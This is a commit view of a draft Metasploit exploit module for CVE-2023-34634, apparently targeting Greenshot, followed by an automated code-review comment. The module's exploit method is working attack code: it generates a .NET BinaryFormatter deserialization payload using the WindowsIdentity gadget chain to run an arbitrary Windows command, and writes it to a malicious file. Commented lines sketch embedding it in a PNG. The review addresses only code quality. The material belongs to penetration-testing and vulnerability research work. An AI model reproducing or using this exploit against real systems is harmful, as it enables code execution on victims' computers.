First attempt at CVE-2023-34634
parent
cd8cd0a52b
commit
59e3760509
BIN
data/exploits/cve-2023-34634/test.png
Normal file
BIN
data/exploits/cve-2023-34634/test.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 256 KiB |
@ -0,0 +1,82 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Post::File
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'TBA',
|
||||
'Description' => %q{
|
||||
TBA
|
||||
},
|
||||
'DisclosureDate' => '2023-07-26',
|
||||
'Author' => [
|
||||
'p4r4bellum', # Discovery
|
||||
'bwatters-r7', # msf exploit
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2023-34634'],
|
||||
['EDB', '51633']
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Targets' => [
|
||||
[
|
||||
'Windows Command',
|
||||
{
|
||||
'Arch' => ARCH_CMD,
|
||||
'Type' => :windows_command,
|
||||
'Space' => 3000
|
||||
}
|
||||
]
|
||||
],
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'Reliability' => [REPEATABLE_SESSION],
|
||||
'SideEffects' => [ARTIFACTS_ON_DISK]
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
register_options([
|
||||
OptPath.new('PNG_FILE', [false, 'PNG file to use', 'xyz'])
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
vprint_status('Hello')
|
||||
if datastore['PNG_FILE'].blank?
|
||||
File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')
|
||||
else
|
||||
datastore['PNG_FILE']
|
||||
end
|
||||
|
||||
cmd = payload.encoded
|
||||
# cmd = 'calc'
|
||||
|
||||
# image_data = File.binread(image_file)
|
||||
|
||||
deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(
|
||||
cmd,
|
||||
gadget_chain: :WindowsIdentity,
|
||||
formatter: :BinaryFormatter
|
||||
)
|
||||
file_create(deserialize_cmd)
|
||||
# vprint_status('Hello1')
|
||||
# exploit_data = image_data + deserialize_cmd
|
||||
# vprint_status('Hello2')
|
||||
# exploit_data << [exploit_data.length].pack('Q')
|
||||
# vprint_status('Hello3')
|
||||
# exploit_data << "Greenshot01.02"
|
||||
# vprint_status('Hello4')
|
||||
# file_create(exploit_data)
|
||||
end
|
||||
end
|
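Review bot: The `if datastore['PNG_FILE'].blank? … end` expression at the top of `exploit` is evaluated and its value discarded, so the `PNG_FILE` option has no effect on the file that `file_create` writes. Because the option is registered with the placeholder default `'xyz'`, the `.blank?` branch is only reached when the user clears it. I would remove the option and the conditional until the code that consumes them is active, or assign the result (`image_file = if datastore['PNG_FILE'].blank?`) and register the option with no default. `'Name'` and `'Description'` are still `TBA`, so nothing tells an operator or a defender which application and versions are affected, or which on-disk artifact `ARTIFACTS_ON_DISK` refers to; both should be filled in before this is merged. `include Msf::Post::File` appears unused in a FILEFORMAT module, and the `vprint_status('Hello')` call and the commented-out experiments should be removed.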